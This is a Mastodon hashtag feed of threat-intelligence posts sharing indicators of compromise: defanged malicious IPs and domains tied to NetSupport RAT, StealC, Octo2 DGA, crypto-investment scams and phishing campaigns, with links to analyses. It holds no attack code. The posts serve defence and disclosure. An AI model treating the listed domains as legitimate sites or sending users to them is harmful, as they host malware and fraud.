Brad<p>2025-03-26 (Wednesday): <a href="https://infosec.exchange/tags/SmartApeSG" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SmartApeSG</span></a> traffic for a fake browser update page leads to a <a href="https://infosec.exchange/tags/NetSupport" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>NetSupport</span></a> <a href="https://infosec.exchange/tags/RAT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RAT</span></a> infection. A zip archive for <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> sent over the <a href="https://infosec.exchange/tags/NetSupportRAT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>NetSupportRAT</span></a> C2 traffic.</p><p>The <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> infection uses DLL side-loading by a legitimate EXE to <a href="https://infosec.exchange/tags/sideload" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>sideload</span></a> the malicious DLL.</p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>pcap</span></a> from an infection, the associated <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> samples, and <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> are available at at <a href="https://www.malware-traffic-analysis.net/2025/03/26/index.html" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/03/26/index.html</span></a></p>
Recent searches
No recent searches
Search options
Only available when logged in.
ruby.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
If you are interested in the Ruby programming language, come join us! Tell us about yourself when signing up.
If you just want to join Mastodon, another server will be a better place for you.
Administered by:
Server stats:
1.1Kactive users
ruby.social: About · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.3.7
#iocs
0 posts · 0 participants · 0 posts today
Funes<p>Yo <a href="https://infosec.exchange/tags/HijackLoader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HijackLoader</span></a> to <a href="https://infosec.exchange/tags/RedLineStealer" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RedLineStealer</span></a> incidents all over the place today. Make sure you're blocking 92.255.85[.]36 at the fw and bitly[.]cx unless you need to use that specific url shortening service for some strange reason.</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a></p>
The Spamhaus Project<p>Mirai is the #1 malware family on <span class="h-card" translate="no"><a href="https://ioc.exchange/@abuse_ch" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>abuse_ch</span></a></span> URLhaus AND MalwareBazaar, with 5,363 sites reported and 3,210 samples shared.</p><p>🔗 URLHaus: <a href="https://www.spamhaus.org/malware-digest/#urlhaus" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#u</span><span class="invisible">rlhaus</span></a><br>👾 MalwareBazaar: <a href="https://www.spamhaus.org/malware-digest/#malwarebazaar" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#m</span><span class="invisible">alwarebazaar</span></a></p><p>But with 3,046 IOCs, find out which malware family is 🔝 of the charts on Threatfox👇 </p><p>🦊 ThreatFox: <a href="https://www.spamhaus.org/malware-digest/#threatfox" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#t</span><span class="invisible">hreatfox</span></a></p><p><a href="https://infosec.exchange/tags/Mirai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Mirai</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/abuseCH" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>abuseCH</span></a></p>
Infoblox Threat Intel<p>Stay alert! These disinformation campaigns affect all of us, no matter where we are!<br> <br>Traffic Distribution Systems (TDSs) run by malicious adtech companies are seen delivering disinformation in different languages, tailored to the country the victim accesses from. They utilize subdomains to differentiate their content. The landing pages impersonate well-known brands and celebrities, aiming to deceive users. It's crucial to block these TDS domains and prevent any content they deliver.<br> <br>Here are some examples of TDS domains that redirect to these disinformation campaigns:</p><p>zoograithavaupy[.]net<br>asjynxon[.]com<br>phaunaitsi[.]net<br> <br>And here are some landing page domains associated with this campaign:</p><p>cooknove[.]com<br>healthbrit[.]com<br>foodleas[.]com<br>daily-web[.]live</p><p><a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> <a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>scam</span></a> <a href="https://infosec.exchange/tags/fraud" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>fraud</span></a> <a href="https://infosec.exchange/tags/disinformation" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>disinformation</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/threatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntelligence</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/domains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>domains</span></a> <a href="https://infosec.exchange/tags/impersonating" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>impersonating</span></a><br> <br><a href="https://urlscan.io/result/ef3f29ea-67df-4010-8a18-4638d401ab67/#summary" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">urlscan.io/result/ef3f29ea-67d</span><span class="invisible">f-4010-8a18-4638d401ab67/#summary</span></a></p>
Sophos X-Ops<p>You should also pay attention to the Address Bar if you’re prompted to log in to a service you use after opening an email attachment. </p><p>All of the <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> pages that loaded in our tests displayed the criminals’ website address, which was clearly not a <a href="https://infosec.exchange/tags/Microsoft" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Microsoft</span></a> website. The Russian URLs were pretty obvious, if you looked.</p><p>We published the list of the <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> domains and other <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> on our Github page.</p><p><a href="https://github.com/sophoslabs/IoCs/blob/master/20250205_SVGspam.csv" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/sophoslabs/IoCs/blo</span><span class="invisible">b/master/20250205_SVGspam.csv</span></a></p><p>Stay safe, everyone.</p><p><a href="https://news.sophos.com/en-us/2025/02/05/svg-phishing/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.sophos.com/en-us/2025/02/</span><span class="invisible">05/svg-phishing/</span></a></p><p>9/9</p>
Infoblox Threat Intel<p>Some days ago, one of our specialists received a call from a scammer - who even knew his name - and he didn't miss the opportunity to potentially gather some threat intelligence. <br> <br>The scammer said he was from a company called Blockchain and wanted to inform him that his Bitcoin wallet hadn't been touched for a long time. Don't you think that's really nice of Blockchain?<br> <br>Of course, our specialist knew what to do. He asked for the company website, and the scammer eagerly provided it. After running the domain through our data, it turns out it is owned by (surprise, surprise) a crypto gang running their scams out of Georgia and Israel. <br> <br>How does this scam work? This group creates extensive networks of fake trading websites promising high returns. To profit, victims just need to share their phone numbers. They are then contacted by multilingual call centers and encouraged to "invest" in crypto, AI, or other ventures. The fake website shows the victim's assets increasing in value, prompting further engagement. The criminals continue to call and entice victims to deposit more money. Unfortunately, the victim won't profit from this.<br> <br>As DNS experts, we have been monitoring their infrastructure for a while now, and they have 1,133 other domains such as:<br> <br>- apexcapitalmarket[.]com<br>- bitmininexpert[.]com<br>- coinfxbrokers[.]com<br>- cryptorinfo[.]com<br>- goldcapitalstocks[.]net<br>- kingstrades[.]net<br>- profxcapitalgroup[.]com<br>- smartcointrades[.]com<br>- stocktradefastminers[.]com<br>- tradeproinvest[.]com<br>- trusttrade21[.]com<br> <br>Here is a reporting reference: <a href="https://www.eurojust.europa.eu/news/support-arrest-online-scammers-georgia-and-israel" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">eurojust.europa.eu/news/suppor</span><span class="invisible">t-arrest-online-scammers-georgia-and-israel</span></a><br> <br><a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>scam</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/domains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>domains</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/crypto" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>crypto</span></a> <a href="https://infosec.exchange/tags/cryptoscams" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cryptoscams</span></a></p>
The Cybersecurity Librarian :donor:<p>They should be called Indicators of Contact <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a></p><p>Rarely are they Indicators of Compromise. IOCs are potentially something.</p><p>It is more like feeling a bump while in a boat. “What hit us?” “Did it do damage?” “Are we about to sink?”</p><p>Indicators of Contact (the bump) are more interesting than Indicators of Compromise (the sinking).</p>
Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #9<br>Today I want to talk about two things: context in threat intelligence and LLM structured outputs.</p><p>What is the relation? Let me explain 🤔</p><p>🔍 Threat Intel is all about context—understanding an information and making it usable. Without context, most IOCs are just noise. Context tells us why an IP address is flagged, how a threat actor operates, and what actions to take next.<br>Threat intel reports are all about providing the context of why a specific indicator is malicious. However, most of the time, you have to dig through the report to understand the context of an IOC and why it is considered malicious.</p><p>This is where LLMs and structured outputs come in. 👇</p><p>👨💻 Structured Outputs is a feature that allow to keep the model consistently generates responses based on a supplied JSON Schema. This removes concerns about missing required keys or invalid values. We can define a structured JSON schema to extract the exact data we need from a report.</p><p>I built a basic example where I extract all kinds of IOCs from a threat report. </p><p>The output includes:</p><p>- Type of IOC<br>- Value of IOC <br>- Context of the IOC<br>- MITRE ID<br>- Recommended Action</p><p>You can find my code in my gist, along with the execution details below! 👇</p><p>➡️ Code: <a href="https://gist.github.com/fr0gger/3acd7d8235421c3ca12be2b2d0dfbc26" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">gist.github.com/fr0gger/3acd7d</span><span class="invisible">8235421c3ca12be2b2d0dfbc26</span></a><br>➡️ OpenAI Structured Output: <a href="https://platform.openai.com/docs/guides/structured-outputs" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">platform.openai.com/docs/guide</span><span class="invisible">s/structured-outputs</span></a></p><p>Of course, if you have a structured and consistent output, you can do whatever you want with it. But that is a topic for another day! 😉 </p><p><a href="https://infosec.exchange/tags/genai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>genai</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/llm" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>llm</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/mitre" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mitre</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a></p>
Thomas Roccia :verified:<p>🤓 I’ve been using Maltego Graph for a while, and it’s one of the best tools for visualizing investigations and pivoting!</p><p>One of the best feature is the use of Machines to automate pivoting and enrichment! 🤖</p><p>🔍 For example, you can create a Machine to automatically enrich an IP address with WHOIS info and then pivot through associated email addresses with a single click.</p><p>I have created a cheat sheet you can refer to when using Maltego 👇</p><p>I’m curious — how many of you have already created Maltego automation with Machines? </p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@Maltego" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>Maltego</span></a></span> <span class="h-card" translate="no"><a href="https://twtr.plus/users/maltegohq" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>maltegohq</span></a></span> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/investigation" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>investigation</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/IOCS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCS</span></a> <a href="https://infosec.exchange/tags/graphs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>graphs</span></a> <a href="https://infosec.exchange/tags/maltego" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>maltego</span></a></p>
Infoblox Threat Intel<p>Continued fun in mobile threats.. One of our analyst received these two different threats on her household Android phones on the same day.. usually Google does a pretty good job filtering them out, but failed here. These show two different <a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> trends that we see in practice. The use of a shortener which redirects to an Amazon lookalike domain -- we often just see the lookalike in the message.<br> <br>The amazon one led to amazonfey[.]co and the same actor had over 300 active lookalikes to Amazon and other services. These guys are fairly easy to track in DNS using fingerprinting. Blocking at DNS providers will help reduce where Google, Apple, and other service providers miss some.<br> <br>The Wells Fargo / Apple alert used an old domain -- a "drop catch" that has been picked up by a threat actor. This might look obvious but people work on alarm -- if you have a Wells Fargo account and see a big charge, you might just click without thinking. <br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/InfobloxThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfobloxThreatIntel</span></a> <a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/dropCatchDomains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dropCatchDomains</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/lookalikes" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>lookalikes</span></a></p>
Infoblox Threat Intel<p>The banking trojan, Octo2, now employs a Domain Generation Algorithm (DGA)!<br> <br>The new variant of the Octo (ExobotCompact) banking trojan, Octo2, is targeting mobile users with several new advanced features. This malware is known for disguising itself as legitimate apps, taking control of the victim’s device to steal sensitive information and commit on-device fraud. For now, the malware has been seen in the wild in Italy, Poland, Moldova, and Hungary, masquerading as apps like NordVPN and Google Chrome. Unfortunately, given its history, it is expected to become global soon.<br> <br>This new variant, investigated by ThreatFabric, features enhanced functionalities, including a Domain Generation Algorithm (DGA) that dynamically changes its command-and-control (C2) server addresses, making it significantly harder to detect.<br> <br>Here are some domains associated with this new variant that we have in our collection:</p><p>5106c5dbc9e0d004489af35abec41027[.]info<br>7729f264dc01834757c9f06f2d313e28[.]com<br>a414602e421935fd057be3c06a3d080c[.]info<br>53cd7bfaebd095ad083c34f007469ff5[.]biz<br>5fa5009fb05a5cee1abd7a2dbb6eb948[.]net<br>8921267492331aabcb4394c801d4e490[.]shop<br>bbad1dcadd801af41da97ecf292b147f[.]xyz<br>c80530d100da2e953c21c55d7cb4b86a[.]info<br>ffce9e39ccdfbe3f1e88806545321ad7[.]org<br> <br>ThreatFabric report: <a href="https://www.threatfabric.com/blogs/octo2-european-banks-already-under-attack-by-new-malware-variant" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">threatfabric.com/blogs/octo2-e</span><span class="invisible">uropean-banks-already-under-attack-by-new-malware-variant</span></a></p><p><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/InfobloxThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfobloxThreatIntel</span></a> <a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/Octo" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Octo</span></a> <a href="https://infosec.exchange/tags/Octo2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Octo2</span></a> <a href="https://infosec.exchange/tags/ExobotCompact" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ExobotCompact</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/dga" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dga</span></a> <a href="https://infosec.exchange/tags/c2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>c2</span></a> <a href="https://infosec.exchange/tags/Trojan" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Trojan</span></a></p>
Colin Cowie<p>Google tracking template abuse never fails to shock me. </p><p>Despite this ad looking like a official link to google's app store it actually redirects you to site delivering a evasive <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infostealer</span></a> with zero detections on VirusTotal. Sophos is now detecting this sample as "Troj/Mdrop-KAA" and "Troj/Steal-DYZ" for the payload</p><p>Checkout <span class="h-card" translate="no"><a href="https://infosec.exchange/@jeromesegura" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>jeromesegura</span></a></span>'s recent blog on this campaign:</p><p><a href="https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malwarebytes.com/blog/news/202</span><span class="invisible">4/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator</span></a> </p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> :<br>- axi-card[.]us (redirection)<br>- chromeweb-authenticatr[.]com (fake site)<br>- <a href="https://www.virustotal.com/gui/file/ba3cdc5190b44da96e5ecb5f39e2cbe3713984dc8062cdab679c759de51500b1/details" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">virustotal.com/gui/file/ba3cdc</span><span class="invisible">5190b44da96e5ecb5f39e2cbe3713984dc8062cdab679c759de51500b1/details</span></a></p><p><a href="https://infosec.exchange/tags/malvertising" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malvertising</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
AndiMann<p>QQ for my <a href="https://masto.ai/tags/ITOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ITOps</span></a> crew:</p><p>What is the best <a href="https://masto.ai/tags/conference" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>conference</span></a>, <a href="https://masto.ai/tags/event" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>event</span></a>, <a href="https://masto.ai/tags/tradeshow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tradeshow</span></a> to learn about <a href="https://masto.ai/tags/CloudOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudOps</span></a>, <a href="https://masto.ai/tags/AIOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>AIOps</span></a>, <a href="https://masto.ai/tags/Observability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Observability</span></a>, <a href="https://masto.ai/tags/SRE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SRE</span></a>, <a href="https://masto.ai/tags/PlatformEngineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PlatformEngineering</span></a>, <a href="https://masto.ai/tags/devOPS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>devOPS</span></a>, <a href="https://masto.ai/tags/reliability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reliability</span></a> engineering, and other modern <a href="https://masto.ai/tags/CloudNative" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudNative</span></a> approaches for <a href="https://masto.ai/tags/IT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IT</span></a> Ops?</p><p><a href="https://masto.ai/tags/Reinvent" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Reinvent</span></a>, <a href="https://masto.ai/tags/IOCS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCS</span></a>, <a href="https://masto.ai/tags/DevOpsDays" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>DevOpsDays</span></a> ... and?</p>
AndiMann<p>QQ for my <a href="https://masto.ai/tags/ITOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ITOps</span></a> crew:</p><p>What is the best <a href="https://masto.ai/tags/conference" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>conference</span></a>, <a href="https://masto.ai/tags/event" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>event</span></a>, <a href="https://masto.ai/tags/tradeshow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tradeshow</span></a> to learn about <a href="https://masto.ai/tags/CloudOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudOps</span></a>, <a href="https://masto.ai/tags/AIOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>AIOps</span></a>, <a href="https://masto.ai/tags/Observability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Observability</span></a>, <a href="https://masto.ai/tags/SRE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SRE</span></a>, <a href="https://masto.ai/tags/PlatformEngineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PlatformEngineering</span></a>, <a href="https://masto.ai/tags/devOPS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>devOPS</span></a>, <a href="https://masto.ai/tags/reliability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reliability</span></a> engineering, and other modern <a href="https://masto.ai/tags/CloudNative" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudNative</span></a> approaches for <a href="https://masto.ai/tags/IT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IT</span></a> Ops?</p><p><a href="https://masto.ai/tags/Reinvent" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Reinvent</span></a>, <a href="https://masto.ai/tags/IOCS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCS</span></a>, <a href="https://masto.ai/tags/DevOpsDays" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>DevOpsDays</span></a> ... and?</p>
The Spamhaus Project<p>This month StealC 🔝 tops the charts for malware families associated with malware sites at 4,577 samples shared on URLHaus. Meanwhile Cobalt Strike remains #1 for IOCs shared - find out which malware are in the Top10 at the links below:</p><p>ThreatFox | IOCs shared:<br>👉 <a href="https://www.spamhaus.org/malware-digest/#threatfox" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#t</span><span class="invisible">hreatfox</span></a></p><p>URLHaus | Malware sites:<br>👉 <a href="https://www.spamhaus.org/malware-digest/#urlhaus" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#u</span><span class="invisible">rlhaus</span></a></p><p>All the data in the Malware Digest is provided by <span class="h-card" translate="no"><a href="https://ioc.exchange/@abuse_ch" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>abuse_ch</span></a></span>'s community driven open platforms.</p><p><a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> <a href="https://infosec.exchange/tags/CobaltStrike" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CobaltStrike</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/abuseCH" class="mention hashtag" 